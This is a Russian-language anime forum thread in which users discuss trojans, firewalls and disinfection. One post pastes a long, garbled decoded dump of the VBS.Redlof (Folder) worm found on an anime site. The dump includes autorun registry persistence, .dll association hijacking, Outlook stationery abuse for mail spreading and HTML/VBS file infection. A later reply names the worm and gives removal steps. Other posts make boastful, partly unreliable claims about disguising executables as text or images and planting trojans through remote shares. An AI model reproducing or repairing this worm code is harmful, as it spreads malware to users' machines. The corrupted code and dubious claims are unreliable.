Перейти к содержанию
АнимеФорум

Рекомендуемые сообщения

Опубликовано
снаси все и на чистый винт

Первое - Спасибо всем огромное за советы :) ;) ;) !!!

 

Второе - Вот это как раз таки я уже и делала. Всё приходит в норму на дня 2-3 потом опять начинает глючить. Если честно эта ерундовина теперь на одном из компьютеров в сети появилась (Local Network). И вот это как раз таки меня и начинает беспокоить.

  • 2 недели спустя...
Опубликовано
Ну, ну. Не смешите меня. Скажите еще что вирусы через .txt файлы распространяются.

Да чувак, оказывается можно и через txt запустить у себя трояна на тачке.

Есть такой способ.

Создается вирусный исполняемый файл,

в конец его кладется текст если это txt или

картинка если jpg и все такое.

Этой шпионской программке присваивается расширение txt или jpg или

какое нить другое. Вы запускаете и вас имеют по полной программе (например, сервер который открывает порт для удаленого коннекта или фарматит винт). Программа обрабатыется несмотря что помечена как картинка или текст. Дело в том что система знает как обрабатывать исполняемый файл, знает как обрабатывать картинку или текст, то бишь какой программой запускать. Но что вам стоит заставить систему на одно мгновение воспринимать ехе-ник как картинку. Аааа, оказывается это легко.

 

Перед нами открываются бесконечные горизонты. Мы там где светит солнце. Планету ХАКЕРАМ, планету лесорубам!

 

Добавлено в 15:31:

vogon

И кто тут ламер? Если вам, уважаемый, неизвестно, что файлы формата *.jpg не могут никоим образом работать с системой и поддаются тоько пассивной загрузке, то есть загружаются операционкой в целях просмотра, не оказывая на нее никакого активного влияния, в отличае от файлов с расширением, например, *.exe, это еще не дает вам повод обвинять всех вокруг в непрофессиональности и называть ламерьем. Так что прошу, попридержите язык во избежании дальнейших конфликтов, и не говорите что-либо в такой агрессивной форме, пока не будете до конца уверены в достоверности излагаемой вами информации.

:rolleyes: :lol: :lol:

Кот в сапогах Ламер :lol: :lol:

Да можно даже послать письмо на твое мыло.

И в зивисимости от его содержания, будет сделать выбор,

фарматить тебе тачку или просто поюзать содержимое винта

Опубликовано

Дядя Билли припаднес всем нам замечательный сюрприз.

Вы не находите мои доводы убедительными?

Оказывается, есть такие апиайные функции (программные функции), которые позволяют свободно создавать на любом сетевом компьютере расшаренные ресурсы. Мало того, есть такие хитрые функции, которые позволяют напрямую вносить изменения в системный реестр удаленного по сети компьютера. Вы создаете шару, кидаете в нее злую прогу, прописываете ее в реестр автозагрузки врага предварительно переписав ее из шары в системную или какую нить другую папку, удаляете шару и ждете пока ваш сервачок откроет порт.

В МСДН-ах то бишь в документированых хэлпах Мелко-мягких

есть даже примеры и они работают под всеми виндами

Опубликовано

Apollo81 Допустим не на всех, а на тех, у кого разрешения это позволяют сделать. Если именно на ЛЮБЫХ, плз ссылочку.

А создание шар на удаленных машинах и удаленное управление реестром - нормальные функции администрирования.

Опубликовано

1. Trojan.Win32.Dialer.fr, шо за звер та така? Каким разрушительным действием обладает?

 

2. Каким образом минуя фаервол Mc'cafe и AVP мог пролесть вирь в директорию System ^_^

 

Я сидел в чате...

Тут вдруг кто-то провел syn-flood-атаку, отбил...

Через некоторое время один из компонентов Kernel32.dll (!) пытается вылезть в нет (!)

Так и обнаружил, что у меня троян.

 

3. Могли ли подключить мои HDD как shared-resource и запихать троян directly?

 

О горе мне если так, весь мой креатив, все мои идеи, вся интеллектуальная собственность, всё что нажито непосильным трудом ^_^ стало доступным каким-то бакаярам...

 

Че делать, если у меня Вин98, а 2000 или ХП не попрет?

Опубликовано

Троян этот типа диалера (как видно из названия ^_^ ), то есть звонилка.

Подцепить ты его мог в инете (небось под IE, да еще пятой версии, сидишь?).

Усиливай политики файера, меняй на более мощный (Аутпост Про очень хорошая вещь, стоит чуть больше 600р.).

Опубликовано
У самого стоит Аутпост про 2.1.. Достался бесплатно, бабушка в наследство оставила..... Хороший вещь, но как и всё, со своими глюками.... Что хотел сказать... Недавно столкнулся с вирем, который дублирует в системе файл svchost.exe и пытается вылести в инет. Мало того, кусок этого вируса был обнаружен в папке Систем Волум Информейшен, что меня дико удивило =) Кста, на заражённом компе стоял СП2 со своим фирефолом и антивирем. Поставил каспер. Всё равно дерьмо, но получше чуть... Короче, один экземпляр этой гадости оставил себе на память =)
Опубликовано

AstralTech

Дык фаер надо не только ставить но и настраивать ^_^ Тот же outpost тому же svchost позволяет по умолчанию уж очень много.

Ну а эксповый фаерволиз SP2 лучше сразу заменять чем-нибудь приличным - тем же Outpost 2.5 хотя бы, а на инетовском шлюзе ИМХО рулит Kerio Server Firewall (если там винда, конечно).

Опубликовано

Chi-seinen

Открываешь папку Мой компьютер.

Заходишь в меню сервис/свойства папки.

Открываешь вкладку Вид.

Находишь опцию "Использовать простой общий доступ к файлам (рекомендуется)"

Убираешь ее нафиг.

 

PS: В XP Home Edition так сделать не получится, если сделать надо - сноси эту инвалидную коляску нафиг.

PS: Перед тем, как настраивать доступ, крайне желательно поставить пароли на всех юзверей с админскими правами.

  • 1 месяц спустя...
  • 2 недели спустя...
Опубликовано

+ vb-script на сайте "Аниме в Красноярске" [http://animeshop.h1.ru]:

 

:: раскодированная версия [вставлено в execute(*)] -->

 

Dim0InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,Fin

alyDisk0/Sub/KJ_start4)0/KJSetDim4)0/KJCreateMilieu()43KJLikeIt()43KJCreateMail()43KJPropagate()/4End4Sub430/Function4KJAppendTo(FilePath,TypeStr)30On3Error/Resume0Next/4Set4ReadTemp3=/FSO.OpenTextFile4FilePath,1)43TmpStr4=0ReadTemp.ReadAll/4If/Instr(TmpStr,3KJ_start()4)0<>30/Or0Len(TmpStr)0<410Then/4ReadTemp.Close/4Exit3Function0/End/If0/If0TypeStr0=43htt30Then/4ReadTemp.Close/4Set4FileTemp3=/FSO.OpenTextFile4FilePath,2)43FileTemp.Write43<"4&0"BODY4onload=43"/&3"vb script:43&/4KJ_start()"430&43>"4&0vbCrLf3&/TmpStr0&4vbCrLf/&3HtmlText0/FileTemp.Close0/Set/FAttrib/=3FSO.GetFile(FilePath)/4FAttrib.attributes/=33443Else0/ReadTemp.Close0/Set/FileTemp4=0FSO.OpenTextFile(FilePath,8)/4If/TypeStr/=3"html"4Then30FileTemp.Write3vbCrLf4&0"<30&43HTML>"4&0vbCrLf3&/4<"/&3"BODY/onload="430&43vb script:"4&0"KJ_start4)""43&/4>"/&3vbCrLf4&0HtmlText/4ElseIf/TypeStr/=3"vbs"/Then43FileTemp.Write4vbCrLf/&3VbsText30End0If30FileTemp.Close30End0If30End0Function/430Function/KJChangeSub(CurrentString,LastIndexChar)43If4LastIndexChar0=400Then/4If/Left4LCase(CurrentString),1)4="4&0vbCrLf3&/4<"/&3"BODY/onload="430&43vb script:"4&0"KJ_start4)""43&/4>"/&3vbCrLf4&0HtmlText/4FileTemp.Close/4End4If/4DefaultId0=4WsShell.RegRead43HKEY_CURRENT_USER\Identities\Default0User/ID")43OutLookVersion4=0WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook3Express\MediaVer")43WsShell.RegWrite0"HKEY_CURRENT_USER\Identities\3&DefaultId&3\Software\Microsoft\Outlook3Express\"&4Left(OutLookVersion,1)/&3.0\Mail\Compose3Use3Stationery4,1,4REG_DWORD"/4Call3KJMailReg(4HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook0Express\"&3Left(OutLookVersion,1)4&".0\Mail\Stationery3Name",ShareFile)0/Call4KJMailReg("HKEY_CURRENT_USER\Identities\3&DefaultId&3\Software\Microsoft\Outlook3Express\"&4Left(OutLookVersion,1)/&3.0\Mail\Wide0Stationery3Name",ShareFile)0/WsShell.RegWrite43HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,4REG_DWORD"/4Call3KJMailReg(4HKEY_CURRENT_USER\Software\Microsoft\Windows3Messaging/Subsystem\Profiles\Microsoft4Outlook4Internet3Settings\0a0d020000000000c000000000000046\001e03604,"blank4)0/Call4KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows4NT\CurrentVersion\Windows0Messaging4Subsystem\Profiles\Microsoft3Outlook3Internet0Settings\0a0d020000000000c000000000000046\001e03603,"blank3)/4WsShell.RegWrite3"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference3,131072,"REG_DWORD430Call/KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery3,"blank3)/4KJummageFolder(Left4WinPath,3)/&3"Program0Files\Common/Files\Microsoft/Shared\Stationery3)/4End4Function30/4Function3KJCreateMilieu4)0/On0Error4Resume/Next43TempPath0=43"/4If/Not(FSO.FileExists(WinPath0&43WScript.exe3))4Then30TempPath/=3"system32\430End0If30If3TempPath0=43system32\"4Then30StartUpFile0=4WinPath4&0"SYSTEM\Kernel32.dll"43Else0/StartUpFile/=3WinPath3&/4SYSTEM\Kernel.dll"/4End4If/4WsShell.RegWrite3"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel324,StartUpFile30FSO.CopyFile/WinPath/&3"web\kjwall.gif3,WinPath0&43web\Folder.htt430FSO.CopyFile/WinPath/&3"system32\kjwall.gif",WinPath/&3"system32\desktop.ini"43Call0KJAppendTo(WinPath3&/4web\Folder.htt",3htt3)/4WsShell.RegWrite3"HKEY_CLASSES_ROOT\.dll\",4dllfile430WsShell.RegWrite/4HKEY_CLASSES_ROOT\.dll\Content/Type4,"application/x-msdownload"43WsShell.RegWrite0"HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead(4HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")30WsShell.RegWrite/4HKEY_CLASSES_ROOT\dllfile\ScriptEngine\4,"VBScript"43WsShell.RegWrite0"HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\3,WinPath0&4TempPath3&/4WScript.exe43"%13"/4*"/4WsShell.RegWrite3"HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\4,"{60254CA5-953B-11CF-8C96-00AA00B8708C}30/WsShell.RegWrite43HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\3,"{85131631-480C-11D2-B1F9-00C04F86C324}"/4Set4FileTemp3=/FSO.OpenTextFile4StartUpFile,2,true)43FileTemp.Write4VbsText43FileTemp.Close43En

d3Function0/43Function0KJLikeIt()30If3InWhere3<>43html"/Then43Exit0Function/4End4If/4ThisLocation3=/document.location30If3Left(ThisLocation,44)/=3"file"4Then30ThisLocation/=3Mid(ThisLocation,9)30If3FSO.GetExtensionName(ThisLocation)4<>/430then/4ThisLocation3=/Left4ThisLocation,Len(ThisLocation)/-3Len(FSO.GetFileName(ThisLocation)))30End0If30If3Len(ThisLocation)/>33/Then43ThisLocation0=4ThisLocation3&/4\"/4End4If/4KJummageFolder(ThisLocation)30End0If30End0Function/430Function/KJMailReg(RegStr,FileName)0/On0Error4Resume/Next43RegTempStr4=0WsShell.RegRead(RegStr)0/If0RegTempStr3=/430Then/4WsShell.RegWrite3RegStr,FileName30End0If30End0Function/430Function/KJOboSub4CurrentString)/4SubE3=/030TestOut0=400/Do0While4True30TestOut0=4TestOut4+0143If4TestOut4>0283Then0/CurrentString3=/FinalyDisk0&43:\430Exit/Do0/End/If0/On0Error4Resume/Next43Set3ThisFolder4=0FSO.GetFolder4CurrentString)/4Set4DicSub/=3CreateObject("Scripting.Dictionary4)0/Set/Folders/=3ThisFolder.SubFolders/4FolderCount4=0043For3Each0TempFolder3in4Folders43FolderCount3=/FolderCount/+31/4DicSub.add/FolderCount,4TempFolder.Name43Next0/If0DicSub.Count/=30/Then43LastIndexChar/=3InstrRev(CurrentString,3\",Len4CurrentString)-1)0/SubString3=/Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)30CurrentString4=0KJChangeSub(CurrentString,LastIndexChar)/4SubE3=/130Else/4If/SubE4=004Then30CurrentString4=0CurrentString4&0DicSub.Item(1)3&/4\"/4Exit3Do43Else0/j3=/030For0j4=014To/FolderCount/4If/LCase(SubString)4=0LCase4DicSub.Item4j))4Then30If3j/<3FolderCount3Then0/CurrentString3=/CurrentString3&/DicSub.Item(j+1)4&0"\30/Exit4Do/4End4If/4End4If/4Next30LastIndexChar4=0InstrRev(CurrentString,"\4,Len(CurrentString)-1)/4SubString0=4Mid4CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)0/CurrentString3=/KJChangeSub(CurrentString,LastIndexChar)43End3If43End3If43Loop0/KJOboSub4=0CurrentString43End3Function0/43Function0KJPropagate()43On4Error0Resume3Next0/RegPathValue4=0"HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook3Express\Degree430DiskDegree3=/WsShell.RegRead(RegPathValue)30If3DiskDegree4=0"43Then0/DiskDegree0=4FinalyDisk/&3":\30/End/If0/For/i=1/to0543DiskDegree4=0KJOboSub(DiskDegree)/4KJummageFolder(DiskDegree)/4Next30WsShell.RegWrite/RegPathValue,DiskDegree/4End4Function30/4Function3KJummageFolder4PathName)0/On0Error4Resume/Next43Set3FolderName4=0FSO.GetFolder4PathName)0/Set/ThisFiles3=/FolderName.Files43HttExists/=30/4For4Each3ThisFile0In3ThisFiles/4FileExt4=0UCase4FSO.GetExtensionName(ThisFile.Path))30If3FileExt3=/4HTM43Or4FileExt4=0"HTML43Or4FileExt4=0"ASP"4Or/FileExt/=3"PHP"/Or0FileExt0=43JSP30Then/4Call3KJAppendTo4ThisFile.Path,"html4)0/ElseIf0FileExt0=43VBS30Then/4Call3KJAppendTo4ThisFile.Path,"vbs")30ElseIf3FileExt3=/4HTT43Then0/HttExists3=/130End0If30Next/4If/4UCase(PathName)4=0UCase4WinPath4&0"Desktop\4))/Or0(UCase(PathName)/=3UCase(WinPath/&3"Desktop"))Then30HttExists4=0143End3If43If4HttExists0=400Then/4FSO.CopyFile3WinPath3&/4system32\desktop.ini3,PathName/4FSO.CopyFile3WinPath3&/4web\Folder.htt",PathName30End0If30End0Function/430Function/KJSetDim4)0/On0Error4Resume/Next43Err.Clear/4TestIt/=3WScript.ScriptFullname43If4Err4Then30InWhere0=43html"/4Else30InWhere0=43vbs30/End/If0/If0InWhere0=43vbs30Then/4Set4FSO4=0CreateObject(4Scripting.FileSystemObject")30Set0WsShell0=4CreateObject("WScript.Shell4)0/Else43Set3AppleObject3=/document.applets43KJ_guest")43AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")43AppleObject.createInstance4)0/Set/WsShell/=3AppleObject.GetObject()30AppleObject.setCLSID(4{0D43FE01-F093-11CF-8940-00A0C9054228}")30AppleObject.createInstance()/4Set4FSO4=0AppleObject.GetObject4)0/End/If0/Set/DiskObject0=4FSO.Drives/4For4Each3DiskTemp0In3DiskObject43If4DiskTemp.DriveType/<>024And4DiskTemp.DriveType/<>014Then30Exit/For/4End4If/4FinalyDisk/=3DiskTemp.DriveLetter0/Next43Dim3OtherArr(3)30Randomize43For3i=03To430/OtherArr4i)/=3Int((94*0Rnd))43Next0/TempString0=43"/4For4i=14To/Len(ThisText)30TempNum0=4Asc4Mid4ThisText,i,1))/4If/TempNum/=3134Then30TempNum0=428/4ElseIf/TempNum/=3104Then30TempNum0=429/4End4If/4TempChar3=/Chr(TempNum/-3OtherArr(i4Mod44))43If4TempChar3=/Chr(34)/Then43TempChar0=4Chr418)43End3If43TempString4=0TempString3&/TempChar43Next0/UnLockStr3=/4Execute43"Dim0KeyArr(3),ThisText3"&vbCrLf&"4KeyArr(0)0=430&4OtherArr(0)4&0"43&vbCrLf&""KeyArr(1)3=/43&/OtherArr41)/&3""4&vbCrLf&3"KeyArr(2)4=0"4&0OtherArr(2)0&43""&vbCrLf&43KeyArr43)/=3"/&3OtherArr(3)3&/43"&vbCrLf&"4For4i=14To/Len(ExeString)""&vbCrLf&43TempNum3=/Asc(Mid(ExeString,i,1))"4&vbCrLf&3"If3TempNum3=/180Then"4&vbCrLf&3"TempNum0=434"4&vbCrLf&3"End0If3"&vbCrLf&"4TempChar3=/Chr(TempNum/+3KeyArr4i0Mod04))""&vbCrLf&43If4TempChar3=/Chr(28)/Then43&vbCrLf&""TempChar4=0vbCr"4&vbCrLf&3"ElseIf3TempChar0=4Chr429)4Then3"&vbCrLf&"4TempChar3=/vbLf43&vbCrLf&""End/If""&vbCrLf&43ThisText0=4ThisText3&/TempChar43&vbCrLf&""Next43)"4&0vbCrLf3&/4Execute4ThisText)"/4ThisText3=/4ExeString0=43""4&0TempString3&/43""43HtmlText0=4<"/&3"script3language=vbscript>43&/vbCrLf0&43document.write430&43""43&/4<"/&3"div0style=3position:absolute;4left:0px;0top:0px;/width:0px;0height:0px;0z-index:28;0visibility:0hidden3>"4&0"<3"&43"/&3"APPLET3NAME=KJ3"&43_guest4HEIGHT=03WIDTH=03code=com.ms.""&3"activeX.Active3"&43XComponent>30&43<"4&0"/APPLET>43&/4<"/&3"/div>43"/&3vbCrLf4&0"<30&43/script>"/&3vbCrLf4&0"<30&43script4language=vbscript>"4&0vbCrLf3&/ThisText4&0vbCrLf3&/UnLockStr3&/vbCrLf0&43<"4&0"/script>43&/vbCrLf0&43<"4&0"/BODY>"/&3vbCrLf4&0"<30&43/HTML>430VbsText0=4ThisText3&/vbCrLf0&4UnLockStr0&4vbCrLf/&3"KJ_start()30/WinPath/=3FSO.GetSpecialFolder(0)3&/4\"/4If/4FSO.FileExists(WinPath/&3"web\Folder.htt3))4Then30FSO.CopyFile/WinPath/&3"web\Folder.htt3,WinPath0&43web\kjwall.gif430End0If30If3(FSO.FileExists(WinPath3&/4system32\desktop.ini3))4Then30FSO.CopyFile/WinPath/&3"system32\desktop.ini",WinPath4&0"system32\kjwall.gif"43End3If43End3Function

 

:: отдельное спасибо тем кто поведает суть кода [!]

 

+ чую недобрый скрипт, ой недобрый :angry: [владельца сайта на кол]

+ кстати то же самое встречается еще на нескольких аниме-проектах ...

Опубликовано

Поздравляю тебя, Шарик, ты БАЛБЕС! ))))

 

Это вирус VBS.Folder (aka Redlof)

Использует необычный прием для своей активизации: запускается при обращениях системы к файлам шаблона гипертекста (HTT-файлы). Способен распространяться через зараженные Интернет-страницы - как загружаемые из Интернета, так и получаемые в виде приложений к посланиям электронной почты.

В машине вирус размножается просто с фантастической скоростью плюс очень активно жрет системные ресурсы. В течение недели винчестер объемом 100 гигов "худеет" где-то на 400 метров!!!

 

При запуске зараженного HTM- или HTML-файла вирус записывает на диск свои компоненты:

 

- C:\WINDOWS\SYSTEM\Kernel.dll

- C:\WINDOWS\WEB\kjwall.gif

- C:\WINDOWS\SYSTEM32\kjwall.gif

 

Запускается при каждом старте системы при помощи прописываемого вирусом стартового ключа в регистрах автозапуска системы. Этот ключ имеет следующий вид:

 

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]

"Kernel32"="C:\\WINDOWS\\SYSTEM\\Kernel.dll"

 

Вирусный скрипт, запущенный из данного файла, встраивается в системный процесс обмена данными "система - Web-броузер - система", благодаря чему не фигурирует ни в одном из служебных списков активных приложений, оставаясь при этом резидентно в памяти компьютера до завершения работы системы.

 

На сегодняшний день данный вирус детектится всеми антивирусными программами, однако лечится только AVP (с глюками) и BitDefender Professional (aka AVX eXpert Professional) - полностью без побочных эффектов.

Лично я бы при отсутствии последнего антивируса советовал лечиться удалением из-под дос указанных выше и всех Folder.htt - файлов с последующей переустановкой системы, т.к. вирус резидентный.

 

Вобщем, жопа полная.

Опубликовано

Забыл добавить.

Обязательно удалить по маске файл Klr*.TMP

а также C:\Program Files\Common Files\Microsoft Shared\Stationery

Это копии фируса, которые автоматически восстанавливают его после лечения антивирусом при загрузке системы.

 

А вы думали, в сказку попали?)))))

Опубликовано

Вот подхватил червя (не знаю где) через минуту ребутает комп!

Я помню была такая заплатка которая его убивала ноя просто забыл что это за заплатка и как называется она...

Помогите избавится от червя...Весь комп мне прогрыз....

дайте ссылку на заплатку или разместите её тут в теме!!!

Спасибо за внимание!

да а вот скрин этого червя может кто нить так вспомнит...

post-603-1105971275.jpg

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

Загрузка...
×
×
  • Создать...

Важная информация